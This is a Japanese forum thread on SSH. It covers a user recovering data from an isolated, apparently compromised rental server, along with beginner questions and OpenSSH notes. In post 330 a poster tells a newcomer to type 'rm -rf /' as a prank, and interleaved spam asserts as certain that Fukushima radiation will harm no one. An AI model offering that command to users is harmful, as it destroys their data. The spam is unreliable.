まさにそういう事です!

新筐体から旧筐体へはどのようにログインすればいいんでしょうか?

http://qiita.com/maximum80/items/26034cf51f1ed5ce5988
こちらなどを見たんですが、新筐体へはログイン出来ましたが、
新筐体から旧筐体へのログイン方法が分かりません
0224名無しさん@お腹いっぱい。
垢版 |
2015/06/04(木) 21:35:54.66
旧筐体にはsshでログインできてましたか?
まず新筐体にログインします。これは出来てるんですね。
シェルが使えるとします。
scpはsshと同じログイン方法なので、パスワードで入れていたのなら

scp 旧筐体のユーザー名@旧筐体のサーバー名(IPアドレスのほうが確実かも):旧筐体内でのファイル名なりディレクトリ名 新筐体のディレクトリ名

scp root@192.168.1.20:/home/ /home
こんな感じですかね
0225名無しさん@お腹いっぱい。
垢版 |
2015/06/04(木) 21:49:55.09
>>224
大変ありがとうございます。

旧筐体にはログイン出来てないです

$ ssh redadmin@192.168.1.20
とやってみたんですが、駄目でした
0229名無しさん@お腹いっぱい。
垢版 |
2015/06/05(金) 00:24:12.21
>>228
旧筐体にはログインした事ないです

新筐体はIPアドレス・ID・パスワードでログインしました

使用したSSHクライアントソフトは
Poderosa
Tera Term
です
0230名無しさん@お腹いっぱい。
垢版 |
2015/06/05(金) 00:33:05.47
>>229
管理者権限でログインしないと設定できません。
旧筐体の管理者はどうしていますか?
旧筐体の中をあけてハードディスクを取り出したりできますか?
0231名無しさん@お腹いっぱい。
垢版 |
2015/06/05(金) 00:38:02.48
>>230
色々本当ありがとうございます。

redadminでログイン後
rootにスイッチしました

因みにこれまでのはレンタルサーバーでの話です

旧筐体がクラックされた恐れがあるとかで、ネットワークから切り離され
新筐体へのデータ移行はサポート外なので自分でやれと言われてます
0232名無しさん@お腹いっぱい。
垢版 |
2015/06/05(金) 00:40:36.82
>>230
旧筐体の管理者はどうやったら分かりますか?
0233名無しさん@お腹いっぱい。
垢版 |
2015/06/05(金) 00:54:44.94
>>231
 redadminでログイン後
どうやってログインしたのでしょうか?
 $ ssh redadmin@192.168.1.20
 とやってみたんですが、駄目でした
もう一度やってみたら出来たのですか?
0234名無しさん@お腹いっぱい。
垢版 |
2015/06/05(金) 01:08:40.42
Poderosaで
新筐体IPアドレス・ID(redadmin)・パスワード
を設定してログイン

$ su → パスワードを訊かれてrootログイン

出来たのはここまでです。

$ssh-keygen
$ vi ~/.ssh/config
$ cat ~/.ssh/id_rsa.pub >> ~/.ssh/authorized_keys
/etc/ssh/sshd_config
などをいじりましたが、旧筐体にはログイン出来ません

ssh redadmin@旧筐体のローカルIPアドレス
が旧筐体への接続コマンドだと案内されました
0236名無しさん@お腹いっぱい。
垢版 |
2015/06/05(金) 04:34:53.37
>>235
訊かれないです

Connection timed out になります。
0237名無しさん@お腹いっぱい。
垢版 |
2015/06/05(金) 07:09:11.54
>>236
ポートが22以外に設定されてるってことはないですか?
nmapを新筐体に入れてポートスキャンはできますか?
0241名無しさん@お腹いっぱい。
垢版 |
2015/06/05(金) 11:34:54.14
すみません今起きました

>>237
どうやったら入れられますか?

>>238
そうです

>>240
旧筐体内のデータを移行するにはこの方法しかないと
けれどこの方法はナレッジがない為、サポート外で、
自己責任でと言われ、外部サイトを紹介されました

過去に同じような事例で同じ案内した実績があると行ってました
けれど上手く行った例は一軒も確認が取れてないそうです

>>239
メールでの問い合わせは回答が遅く
電話での問い合わせは、メールで回答すると言い、
電話受付終了直前にメールが届きます
全然進みません・・・
0242名無しさん@お腹いっぱい。
垢版 |
2015/06/05(金) 11:46:31.49
>>241
旧筐体が現在も稼動していて、
新筐体と同じローカルネットワークに存在して、
そのローカルネットワーク上での旧筐体のアドレスが192.168.1.20だっていうことは確かなの?
その情報はどこから入手したの?
0243名無しさん@お腹いっぱい。
垢版 |
2015/06/05(金) 11:48:59.59
>>242
確かだそうです(IPは途中で訂正がありましたが)
この情報はサーバー会社から頂きました

※192.168.1.20は数字を変えてあります
0244名無しさん@お腹いっぱい。
垢版 |
2015/06/05(金) 11:53:20.12
旧筐体のポートは22で間違いないそうです
0245名無しさん@お腹いっぱい。
垢版 |
2015/06/05(金) 11:53:41.91
>>243
その情報とこれをサポートから得ていて、
>ssh redadmin@旧筐体のローカルIPアドレスが旧筐体への接続コマンドだと案内されました

新筐体からssh redadmin@旧筐体のローカルIPアドレスをやった結果がこれなら
>Connection timed out になります。

繋がらんぞとサポートに言うだけだろ
0246名無しさん@お腹いっぱい。
垢版 |
2015/06/05(金) 12:00:08.12
>>245
まず最初の時点でSSHの知識がなかった為
他の手段を色々かけあいましたが、断られました

次にSSHを試してみて繋がらないので
問い合わせたところ、IPが違っていたと回答がありました

それでも繋がらないので、先程ポートを確認しましたところ
22であっているとの事でした(今再確認してもらってます)
0247名無しさん@お腹いっぱい。
垢版 |
2015/06/05(金) 12:57:23.25
新筐体にログインして
ping 旧筐体のローカルIP
をやってみて
Destination Host Unreachable
と表示されたら
ifconfig -a
ip route
ip rule
の結果を教えて
ただしifconfig -aのアドレスは置き換えて
0251名無しさん@お腹いっぱい。
垢版 |
2015/06/05(金) 13:08:28.39
>>247
ありがとうございます
「Destination Host Unreachable」は表示されませんでした


PING 192.168.1.20 (192.168.1.20) 56(84) bytes of data.
64 bytes from 192.168.1.20: icmp_seq=1 ttl=64 time=0.626 ms
64 bytes from 192.168.1.20: icmp_seq=2 ttl=64 time=0.627 ms
64 bytes from 192.168.1.20: icmp_seq=3 ttl=64 time=0.633 ms
64 bytes from 192.168.1.20: icmp_seq=4 ttl=64 time=0.624 ms
64 bytes from 192.168.1.20: icmp_seq=5 ttl=64 time=0.631 ms
(中略)

--- 192.168.1.20 ping statistics ---
98 packets transmitted, 98 received, 0% packet loss, time 97059ms
rtt min/avg/max/mdev = 0.606/0.631/0.645/0.029 ms
0255名無しさん@お腹いっぱい。
垢版 |
2015/06/05(金) 22:41:29.34
>>252
そう思うのですが、応じてくれないのです(TT)
来週には旧筐体を回収すると言ってます・・・
0257名無しさん@お腹いっぱい。
垢版 |
2015/06/06(土) 06:20:38.62
レンタルサーバーのバックアップはどちらか行う契約になってたの?
自分で行う事になってたのなら、移行サポートは契約外サービス
向こうが行う契約ならば契約の履行を要求すればいい

ところで、新筐体からssh -vvv redadmin@192.168.1.20した結果見せてよ。
0258名無しさん@お腹いっぱい。
垢版 |
2015/06/06(土) 12:56:42.57
>>257
最新の規約では客側となっておりました

ssh -vvv redadmin@192.168.1.20
少々長いですが貼らして頂きます
0259名無しさん@お腹いっぱい。
垢版 |
2015/06/06(土) 12:57:56.30
OpenSSH_4.3p2, OpenSSL 0.9.8e-fips-rhel5 01 Jul 2008
debug1: Reading configuration data /root/.ssh/config
debug1: Reading configuration data /etc/ssh/ssh_config
debug1: Applying options for *
debug2: ssh_connect: needpriv 0
debug1: Connecting to 192.168.1.20 [192.168.1.20] port 22.
debug1: Connection established.
debug1: permanently_set_uid: 0/0
debug1: identity file /root/.ssh/identity type -1
debug3: Not a RSA1 key file /root/.ssh/id_rsa.
debug2: key_type_from_name: unknown key type '-----BEGIN'
debug3: key_read: missing keytype
debug3: key_read: missing whitespace
(中略)
debug3: key_read: missing whitespace
debug2: key_type_from_name: unknown key type '-----END'
debug3: key_read: missing keytype
debug1: identity file /root/.ssh/id_rsa type 1
debug1: identity file /root/.ssh/id_dsa type -1
debug1: loaded 3 keys
debug1: Remote protocol version 1.99, remote software version OpenSSH_4.3p2
debug1: match: OpenSSH_4.3p2 pat OpenSSH*
debug1: Enabling compatibility mode for protocol 2.0
debug1: Local version string SSH-2.0-OpenSSH_4.3
debug2: fd 3 setting O_NONBLOCK
debug1: SSH2_MSG_KEXINIT sent
debug1: SSH2_MSG_KEXINIT received
debug2: kex_parse_kexinit: diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1
debug2: kex_parse_kexinit: ssh-rsa,ssh-dss
debug2: kex_parse_kexinit: aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour128,arcfour256,arcfour,aes192-cbc,aes256-cbc,rijndael-cbc@lysator.liu.se,aes128-ctr,aes192-ctr,aes256-ctr
0260名無しさん@お腹いっぱい。
垢版 |
2015/06/06(土) 12:58:59.06
debug2: kex_parse_kexinit: aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour128,arcfour256,arcfour,aes192-cbc,aes256-cbc,rijndael-cbc@lysator.liu.se,aes128-ctr,aes192-ctr,aes256-ctr
debug2: kex_parse_kexinit: hmac-md5,hmac-sha1,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96
debug2: kex_parse_kexinit: hmac-md5,hmac-sha1,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96
debug2: kex_parse_kexinit: none,zlib@openssh.com,zlib
debug2: kex_parse_kexinit: none,zlib@openssh.com,zlib
debug2: kex_parse_kexinit:
debug2: kex_parse_kexinit:
debug2: kex_parse_kexinit: first_kex_follows 0
debug2: kex_parse_kexinit: reserved 0
debug2: kex_parse_kexinit: diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1
debug2: kex_parse_kexinit: ssh-rsa,ssh-dss
debug2: kex_parse_kexinit: aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour,aes192-cbc,aes256-cbc,rijndael-cbc@lysator.liu.se
debug2: kex_parse_kexinit: aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour,aes192-cbc,aes256-cbc,rijndael-cbc@lysator.liu.se
debug2: kex_parse_kexinit: hmac-md5,hmac-sha1,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96
debug2: kex_parse_kexinit: hmac-md5,hmac-sha1,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96
debug2: kex_parse_kexinit: none,zlib
debug2: kex_parse_kexinit: none,zlib
debug2: kex_parse_kexinit:
debug2: kex_parse_kexinit:
debug2: kex_parse_kexinit: first_kex_follows 0
debug2: kex_parse_kexinit: reserved 0
debug2: mac_init: found hmac-md5
debug1: kex: server->client aes128-cbc hmac-md5 none
debug2: mac_init: found hmac-md5
debug1: kex: client->server aes128-cbc hmac-md5 none
debug1: SSH2_MSG_KEX_DH_GEX_REQUEST(1024<1024<8192) sent
debug1: expecting SSH2_MSG_KEX_DH_GEX_GROUP
debug2: dh_gen_key: priv key bits set: 123/256
debug2: bits set: 511/1024
debug1: SSH2_MSG_KEX_DH_GEX_INIT sent
0261名無しさん@お腹いっぱい。
垢版 |
2015/06/06(土) 13:00:26.35
debug1: expecting SSH2_MSG_KEX_DH_GEX_REPLY
debug3: check_host_in_hostfile: filename /root/.ssh/known_hosts
debug3: check_host_in_hostfile: match line 2
debug1: Host '192.168.1.20' is known and matches the RSA host key.
debug1: Found key in /root/.ssh/known_hosts:2
debug2: bits set: 514/1024
debug1: ssh_rsa_verify: signature correct
debug2: kex_derive_keys
debug2: set_newkeys: mode 1
debug1: SSH2_MSG_NEWKEYS sent
debug1: expecting SSH2_MSG_NEWKEYS
debug2: set_newkeys: mode 0
debug1: SSH2_MSG_NEWKEYS received
debug1: SSH2_MSG_SERVICE_REQUEST sent
debug2: service_accept: ssh-userauth
debug1: SSH2_MSG_SERVICE_ACCEPT received
debug2: key: /root/.ssh/identity ((nil))
debug2: key: /root/.ssh/id_rsa (0x98eda60)
debug2: key: /root/.ssh/id_dsa ((nil))
debug1: Authentications that can continue: publickey,password,keyboard-interactive
debug3: start over, passed a different list publickey,password,keyboard-interactive
debug3: preferred gssapi-with-mic,publickey,keyboard-interactive,password
debug3: authmethod_lookup publickey
debug3: remaining preferred: keyboard-interactive,password
debug3: authmethod_is_enabled publickey
debug1: Next authentication method: publickey
debug1: Trying private key: /root/.ssh/identity
debug3: no such identity: /root/.ssh/identity
debug1: Offering public key: /root/.ssh/id_rsa
debug3: send_pubkey_test
0262名無しさん@お腹いっぱい。
垢版 |
2015/06/06(土) 13:05:16.38
debug2: we sent a publickey packet, wait for reply
debug1: Authentications that can continue: publickey,password,keyboard-interactive
debug1: Trying private key: /root/.ssh/id_dsa
debug3: no such identity: /root/.ssh/id_dsa
debug2: we did not send a packet, disable method
debug3: authmethod_lookup keyboard-interactive
debug3: remaining preferred: password
debug3: authmethod_is_enabled keyboard-interactive
debug1: Next authentication method: keyboard-interactive
debug2: userauth_kbdint
debug2: we sent a keyboard-interactive packet, wait for reply
debug1: Authentications that can continue: publickey,password,keyboard-interactive
debug3: userauth_kbdint: disable: no info_req_seen
debug2: we did not send a packet, disable method
0263名無しさん@お腹いっぱい。
垢版 |
2015/06/06(土) 13:07:12.09
debug3: authmethod_lookup password
debug3: remaining preferred:
debug3: authmethod_is_enabled password
debug1: Next authentication method: password
redadmin@192.168.1.20's password:
debug3: packet_send2: adding 48 (len 61 padlen 19 extra_pad 64)
debug2: we sent a password packet, wait for reply
debug1: Authentications that can continue: publickey,password,keyboard-interactive
Permission denied, please try again.
redadmin@192.168.1.20's password:
debug3: packet_send2: adding 48 (len 61 padlen 19 extra_pad 64)
debug2: we sent a password packet, wait for reply
Connection closed by 192.168.1.20

以上です
0264名無しさん@お腹いっぱい。
垢版 |
2015/06/06(土) 14:52:34.47
これまで旧筐体にログインしたことはないそうだけど、
(Q1)旧筐体のredadminのパスワードは分かっているのか?

debug1: Next authentication method: password
redadmin@192.168.1.20's password:
debug3: packet_send2: adding 48 (len 61 padlen 19 extra_pad 64)
debug2: we sent a password packet, wait for reply
debug1: Authentications that can continue: publickey,password,keyboard-interactive
Permission denied, please try again.
redadmin@192.168.1.20's password:
パスワードが違っているのでは?

(Q2)旧筐体にどうやってデータをアップロードしていたのか?
FTPやWebDAVなどを使っていたのなら、新筐体からポートフォワードでデータをダウンロードできるかも。
0265名無しさん@お腹いっぱい。
垢版 |
2015/06/06(土) 16:33:59.03
>>264
本当にありがとうございます。
パスワード以外の可能性はなさそうですか?

(Q2)
これまで普通に使用していたサーバーが攻撃を受けて、ネットワークから隔離されてしまったんです。
戻す事はセキュリティ上出来ないから、筐体変更が必要と言われました。
それで新筐体を用意してもらったところ、旧筐体→新筐体へのデータ移行はサポート外と言われました。

(Q1)
昨日電話で問い合わせた時は、新筐体と同じと言われましたが、怪しいです。
旧筐体のローカルIPも後日訂正されましたし。
1日1項目しか進ませてくれませんw

因みに昨日の進歩は「iptables設定解除」でした。
これでパスワードが訊かれる所まで辿り着けました。

週末は休みなので、運が良ければ月曜の夜にパスワードを教えて頂けるかもしれません。
0266名無しさん@お腹いっぱい。
垢版 |
2015/06/06(土) 18:25:09.33
>>265
(Q2)旧筐体にどうやってデータをアップロードしていたのか?
というのは、普通に使用していたという、その内容を聞いています。
例えばWordPressならWordPressの機能を使ってデータをダウンロードできるのではないですか?
新筐体でSSHが使えるのなら、ポートフォワード機能を使って旧筐体のWordPressにアクセスできる可能性があります。
0267名無しさん@お腹いっぱい。
垢版 |
2015/06/06(土) 19:29:15.51
>>266
FTPです。
WordPressは使ってないです。

ポートフォワード機能というのはパスワードなしでアクセス出来るんですか?
0268名無しさん@お腹いっぱい。
垢版 |
2015/06/06(土) 20:44:13.35
>>267
旧筐体にSSHでログインするのは難しそうなので、データを取り出すために
他の方法で入れないかということです。
FTPを使っていたのなら、新筐体で
ftp 旧筐体のIP
とやってみたらどうでしょうか。
FTPでログインできるかもしれません。

ポートフォワードはSSHの機能で、手元のPCからは新筐体にアクセスし、
新筐体のSSHDが、そのアクセスを別のサーバー(今の場合は旧筐体)へ
中継してアクセスするものです。
旧筐体で使っていたのがWebアプリなら、この方法で手元のPCから
旧筐体にアクセスできるかも、と考えたのです。
0269名無しさん@お腹いっぱい。
垢版 |
2015/06/06(土) 23:06:48.59
>>268
ありがとうございます

ですが、その前に旧筐体にSSH接続する事が出来ました
ただ、ディレクトリが見つけられません
0270名無しさん@お腹いっぱい。
垢版 |
2015/06/07(日) 03:14:56.19
お陰様でファイルの移行は無事出来ました。

しかし肝心のmysqlが接続出来ません。。
0271名無しさん@お腹いっぱい。
垢版 |
2015/06/07(日) 05:41:52.90
>>270
おまえさmysqlがどうこう言う前にみんなに説明することがあるだろ
どうして今まではsshで接続できなかったのか
0273名無しさん@お腹いっぱい。
垢版 |
2015/06/07(日) 13:10:39.18
>>270
dbのディレクトリごとtar ballにしてもってきちゃいなよ
そうしたら、手元のマシンでいくらでもできると思うけど
0275名無しさん@お腹いっぱい。
垢版 |
2015/06/07(日) 17:14:18.66
>>271
失礼しました
旧筐体のパスワードが分かった為です

>>272
どうしてもエラーが出てしまいます

ERROR 1045 (28000): Access denied for user '*****'@'localhost' (using password: YES)
0276名無しさん@お腹いっぱい。
垢版 |
2015/06/07(日) 17:46:36.57
おまえら優しすぎ
0278名無しさん@お腹いっぱい。
垢版 |
2015/06/08(月) 08:03:56.92
>>275
そのdbとwebアプリケーションで動いていたのなら、それこそmysqlのdbディレクトリを、まんま新筐体に持って行けば動くだろ?
mysqlのバージョンを合わせりゃこれでも動くぞ
0280名無しさん@お腹いっぱい。
垢版 |
2015/06/08(月) 15:41:30.92
>>273
mysqlディレクト毎をtar.gz圧縮して、新筐体に送信、展開したらPLESK毎動かなくなってしまいました


ERROR: PleskMainDBException
MySQL query failed: Unknown column 'ip_dual_stack' in 'field list'

0: common_func.php3:220
db_query(string 'SELECT login, type, ip_address, ip_dual_stack FROM sessions WHERE sess_id=""')
1: class.Session.php:420
Session->init(string '*.*.*.*')
2: auth.php3:197
0284名無しさん@お腹いっぱい。
垢版 |
2015/06/08(月) 17:36:25.99
>>281-283
稼働中のサーバーでやってしまいました(´Д⊂ モウダメポ

しかもMySQLのバージョンが違ったかもしれません
PLESKのバージョンも違うので

これはサーバー会社に頼んで再インストールしかないですかね?
0285名無しさん@お腹いっぱい。
垢版 |
2015/06/08(月) 20:27:04.51
サーバー会社も災難だな
このスレにも災難だが
0286名無しさん@お腹いっぱい。
垢版 |
2015/06/09(火) 19:13:39.75
>>284
新筐体のディレクトリはバックアップしてなかったのかよ...
0287名無しさん@お腹いっぱい。
垢版 |
2015/09/20(日) 21:08:00.32
SSHとSSLの違いを教えて下さい。
0290名無しさん@お腹いっぱい。
垢版 |
2015/09/24(木) 19:52:10.60
sshでクライアントからログイン出来るPCを制限しようとして
etc/ssh/sshd_configに次の一行を付け加えました
ListenAddress 192.168.1.100
そうしたら192.168.1.100からsshで接続できなくなりました
OS: FreeBSD9.2

/var/log/messagesの内容は
error: Bind to port 22 on 192.168.1.100 failed: Can't assign requested address.
fatal: Cannot bind any address.

何が原因でしょうか、よろしくお願いします
0292名無しさん@お腹いっぱい。
垢版 |
2015/09/26(土) 20:15:26.90
自己解決、ていうか・・・

ListenAddressを設定するのは
NICが複数有るような場合、どのNICで待ち受けるか、ですね
それをクライアントのIPにしたら、接続できないのはあたりまえでした

お騒がせしました、消えます
0293名無しさん@お腹いっぱい。
垢版 |
2015/10/22(木) 22:52:49.54
☆ 日本の核武装は早急に必須ですわ。☆
総務省の『憲法改正国民投票法』、でググってみてください。
日本国民の皆様方、2016年7月の『第24回 参議院選挙』で、日本人の悲願である
改憲の成就が決まります。皆様方、必ず投票に自ら足を運んでください。お願い致します。
0294名無しさん@お腹いっぱい。
垢版 |
2016/01/05(火) 20:08:45.92
sshはDebianだから入ってるみたいだけどどうやって練習すんの?
ここで聞いちゃダメだったら言ってくれ
0300名無しさん@お腹いっぱい。
垢版 |
2016/01/17(日) 13:19:59.91
スマホにSSHクライアントをインストールしてLTEだと正しく接続できたのですが
wifi経由だと"Connection reset by peer"というエラーが出て接続できませんでした。
恐らくルータの設定に問題があると思うのですが、
どの辺をいじればいいのか何かキーワード的なものがありましたら教えてください。
0302名無しさん@お腹いっぱい。
垢版 |
2016/01/29(金) 11:43:14.17
すごく初歩的な質問で申し訳ないのですが
sshで遠隔のLinuxマシン上でプログラムを実行したいと思っています。
プログラムの内容はWebを監視しながら常に最新のデータで
ファイルを上書きしていくというものですが、、、

ssh -l root xxx.xxx.xxx.xxx
cd ~/program/
./check

みたいな感じでプログラムを走らせることは出来るのですが
その後はプログラムを走らせた状態でssh通信を終わらせたいのです。

今のところ
Ctrl+cでプログラムを終わらせてexitでssh通信を終わらせてるのですが、
どういう風にすればプログラムを起動させたままsshを終了できるのでしょうか。

また、更にその後、プログラムを止めたいと思ったときに、
再度sshでログインして、実行中のプログラムを止めるみたいなことも可能なのでしょうか?

linuxはyocktです。最近Intelのedisonを買ってみて
初めてlinuxのCUIを触ったもので全然勝手が分かっておらず・・・
0304名無しさん@お腹いっぱい。
垢版 |
2016/01/29(金) 17:28:34.20
ありがとうございます!
まさにそれが知りたかったです

SSHでスレタイ検索したのでUNIX板に来てしまったようです
失礼しました
0306名無しさん@お腹いっぱい。
垢版 |
2016/04/22(金) 08:34:58.21
初歩的な質問なのですが
一台のマシンから複数のマシンに
鍵認証させるにはどうしたらいいのですか?
0309名無しさん@お腹いっぱい。
垢版 |
2016/04/22(金) 10:28:46.61
>>307
それが上手くいけまんでした
詳しお願いいたします
0311名無しさん@お腹いっぱい。
垢版 |
2016/04/22(金) 12:04:19.34
公開鍵認証とCA(自前の認証局)でユーザー認証とかってやったことある人いる?
0325名無しさん@お腹いっぱい。
垢版 |
2016/04/23(土) 13:10:25.89
端末側じゃなくてサーバー側のロケーィルとか文字クォードの問題かもしぬ。

問1.そのカラー液晶の画面とやらにつながっているコンピューターのOSが何か答えよ。
問2.そのコンピューターで日本語が表示されるかどうか答えよ。
問3.使用しているSSH端末エミュレーターの名称を答えよ。
問4.SSHでログインしているサーバーのOSが何か答えよ。
問5.SSHでログインしているサーバーのロケールを答えよ。
問6.おぬしにSSHを使えと言った奴が誰か答えよ。
0326名無しさん@お腹いっぱい。
垢版 |
2016/04/23(土) 17:05:26.03
問1.NECです
問2.ケースを開ける時は電源プラグをコンセントから抜いてくださいと表示があります
問3.エミューレーターではありません 実物マシンです
問4.サーバーではありません
問5.サーバーじゃないのでわかりません
問6.シェルが使いたかっただけです
0327名無しさん@お腹いっぱい。
垢版 |
2016/04/23(土) 17:39:16.00
>>326
よく聞け、新兵。これからお前が口からクソを吐く、その前と後ろにサーを付けろ。

NECなどというOSは存在しない。OSというはウィンドウズテンとかOSテンとかウブンツとかそういうものだ。
今から貴様のOSはNECではなくウィンドウズテンだ。もし違っているなら今すぐウィンドウズテンにするんだ。
次はターミナルだ。お前が使用しているのはテラタームだな。もし違っているなら今すぐテラタームをダウンロードしてインストールするんだ。

ここまでは出来ているんだろうな。よし、さっさとログインしてみろ。ユーザー名とパスワードを入力したな。
公開鍵を使用していないとしても、それはここでは大目に見てやろう。ただし今回だけだ。

uname -a
と入力してみろ。最後にエンターキーを押すのを忘れるな。
これでシェルが使えているのが分かっただろう。
何が問題か言ってみろ。
0328名無しさん@お腹いっぱい。
垢版 |
2016/04/23(土) 22:02:52.86
'uname'は、内部コマンドまたは外部コマンド、
操作可能なプログラムまたはバッチ ファイルとして認識されていません。
0330名無しさん@お腹いっぱい。
垢版 |
2016/04/24(日) 12:11:37.08
>>326
#のあとに、rm -rf /とタイプして"ENTER"キー押したらシェルが体験できるよ。
0331名無しさん@お腹いっぱい。
垢版 |
2016/04/24(日) 12:14:51.75
'rm'は、内部コマンドまたは外部コマンド、
操作可能なプログラムまたはバッチ ファイルとして認識されていません。
0337名無しさん@お腹いっぱい。
垢版 |
2016/04/27(水) 20:35:36.59
ファイルをコピーするにはどうすればいいんでしょうか?
cpというプロンプトを使えと教えられたんですが、
やってみたら同じようなファイルが2つできただけで、
コピーはとれませんでした。

ちなみにログインシエルはSSHです。
0344名無しさん@お腹いっぱい。
垢版 |
2016/05/01(日) 13:46:59.20
>>337
馬鹿だな。
今時、ゼロックスできないとかw
0346名無しさん@お腹いっぱい。
垢版 |
2016/05/01(日) 20:51:52.10
ファイルを移動するにはどうすればいいんでしょうか?
mvというプロンプトを使えと教えられたんですが、
やってみたらファイルの名称が変わっただけで、
ファイルは職場のパソコンの中のまま移動しませんでした。

ちなみにログインシエルはSSHです。
0347名無しさん@お腹いっぱい。
垢版 |
2016/05/02(月) 11:37:22.75
>>346
そもそも mv を使ってファイル名が変わったということは
きちんとコマンド入力して 移動先 を指定したということで
その結果パソコンの中のままとかそういう表現はしない

ネタとしても3番煎じだし、適切な改行もマイナスポイント
素人のまねをしようとしても まともさはにじみ出てしまう
もっと狂気に身を委ねる必要があります
0348名無しさん@お腹いっぱい。
垢版 |
2016/05/02(月) 12:35:03.25
>>346
省略語は嫌いだ。それは電子ファイル。電子ファイルとファイルは違う。
ファイルと言ったらコクヨに綴じたやつのこと。勝手に電子を省略しないように。
0350名無しさん@お腹いっぱい。
垢版 |
2016/05/02(月) 13:40:16.32
>>348
電子ファイルって何?
0356名無しさん@お腹いっぱい。
垢版 |
2016/05/06(金) 18:27:13.36
電子ファイルを電子コピーするにはどうすればいいんでしょうか?
電子cpという電子プロンプトを使えと教えられたんですが、
やってみたら同じような電子ファイルが2つできただけで、
電子コピーはとれませんでした。

ちなみに電子ログインシエルは電子SSHです。
0359名無しさん@お腹いっぱい。
垢版 |
2016/05/12(木) 11:09:57.63
SSHの暗号鍵を作成するとき、
RSAなんちゃらという表示と共に
○や・の落書きみたいな図が表示されますが、
それを生成するツールってなんでしょうか?
単独で使いたいので、手がかりだけでも
教えていただけるとありがたいです。
0363名無しさん@お腹いっぱい。
垢版 |
2016/05/29(日) 16:23:50.28
                   「ホテル 放射能」 を建設しようかと、考え始めています。

         また、私たちの愚かな「放射能コワイ、コワイ」派の敵どもが、ギャーギャー騒ぐでしょう。
   本当に、この愚か者たちは、自分の脳に張り付いた放射能恐怖症で、救いようのない者たちだと、思います。

       10年後に死ぬ、おそらくそのうちの多くは、子供たちだと、この馬鹿たちは、信じ込んでいる。
  私は、呆(あき)れかえる。福島では、誰も死なない。発病して死ぬ者はひとりもいない。そのように断言します。

私の同志は、山下俊一(やましたしゅんいち)長崎大学教授 (現在は、福島県立医大副学長も兼任している) である。 
山下教授らに、バッシングの嵐を浴びせた者たちは、ずるい逃げ方をするな。「私は、そんなことは言わなかったよ」と言うな。

福島で放射能にせいで癌になる(放射能による癌は甲状腺がんだけである)人はひとりも出ない、という専門医学者の高田純の表明を私は尊重する。 
専門家でもなく、放射能の人体への影響について、素人と同じくせに、偉そうに発言する者たちを、私たちは、厳しく排撃しなければならない。[1792]

どっちが福島の人間たちに対して、犯罪的か。「福島に近寄ってはいけない」と、実名で書いた者たちを、私たちは、記憶していなければいけない。
   私、副島隆彦が今も不愉快なのは、学問道場の会員を止(や)めた人が、1000人ぐらい出たことだ。[1879]

      「今も会員でいる人たちには、その人間としての余裕がある。]会員に求められる資質はこれである。
      道場を退会した者たちは、まず自らの信念とは何かについて真剣に考えなければならない。[1880]



山下(俊一)先生が『汚染されたものを食べても大丈夫』とテレビで発表した後、
チェルノブイリで活動していたグループが山下先生に電話をしたら『立場上仕方がなかった』と答えた。
「山下(俊一)先生は ベラルーシbフ状況を全部知bチています。そbオてその情報を荘S部秘密にしてb「るんです。 だから秘密保全法なんです」――。
https://twitter.com/neko_aii/status/735476420361605120
0364名無しさん@お腹いっぱい。
垢版 |
2016/07/13(水) 21:20:29.88
ずいぶん長い間ほったらかしだったPoderosaが有償化して戻ってきてるぞ!
試用は無期限にできると言うが...
https://ja.poderosa-terminal.com/
0373名無しさん@お腹いっぱい。
垢版 |
2016/10/01(土) 12:44:56.18
31-168-172-143.telavivwifi.com とか
static-82-85-187-101.clienti.tiscali.it とか
bl20-203-6.dsl.telepac.pt とか
最近逆引きできる IP アドレスから突撃してくる奴が多いなぁ
0375名無しさん@お腹いっぱい。
垢版 |
2016/10/09(日) 10:56:58.62
dropbearのサーバーはOpenSSHにくらべて少し軽い気がする。
非力なマシンで使うと。
暗号負荷はそんな変わんないはずだから余計な前処理してないのかね
0376名無しさん@お腹いっぱい。
垢版 |
2016/10/15(土) 13:37:35.83
Rlogin、上の方で言われていたフォント設定が面倒な点も改善されてて
単一軽量exeファイルで動作するとてもよいクライアントだと思う

ただ普通にシェル叩いてるぶんにはいいんだけど
midnight comander使うと枠線がうまく表示されない
設定いじればいいのかなぁ
0377名無しさん@お腹いっぱい。
垢版 |
2016/11/03(木) 19:01:26.82
トリビア:OpenSSH 7.3p1 は OpenSSL 1.1.0b と組み合わせられない。1.0.x系のみ

誰かやってるはずだと思いながら自分で1.1.0対応パッチ書いて、
あとでやっぱ似たようなものがあると知ったorz
のだが、完成度では自分の書いたものが一番のようだ
0378名無しさん@お腹いっぱい。
垢版 |
2016/11/03(木) 19:03:42.42
大本のOpenBSDでは OpenSSL 1.0.3からforkした LibreSSL を使っているので
影響は受けないというか見捨てられている。
今後どうするのかは各所様子見みたいね。
0381名無しさん@お腹いっぱい。
垢版 |
2016/12/20(火) 12:32:01.69
7.4
0383名無しさん@お腹いっぱい。
垢版 |
2016/12/24(土) 10:28:34.71
OpenSSH 7.4p1 の OpenSSL 1.1.0c 対応パッチ作成完了。
テストも通る。

test_utf8だけ通らないが漏れんとこのwcwidth()が腐ってるせいなので
どうにもならん。放置。問題ないだろたぶん
0387名無しさん@お腹いっぱい。
垢版 |
2017/03/10(金) 22:37:24.95
Sierraのcronで他の計算機のデータをssh越しに自動でバックアップしようとして、rsyncのシェルスクリプト作ってログイン中にterminalとcronで動くことを確認した。
ところが、ユーザーがloginしていないと、なぜかkeychainに保存されてるpassphraseがcronの環境に読み込まれないので、errorになるっていう問題だけどMac板いくわ
0388名無しさん@お腹いっぱい。
垢版 |
2017/03/11(土) 02:42:43.57
>>387
そりゃログインしてなかったらkeychainは使えないだろう
0390名無しさん@お腹いっぱい。
垢版 |
2017/03/23(木) 23:07:16.33
7.5でOpenSSL 1.0.1ではconfigure通らなくなった
0394名無しさん@お腹いっぱい。
垢版 |
2017/04/05(水) 10:06:26.88
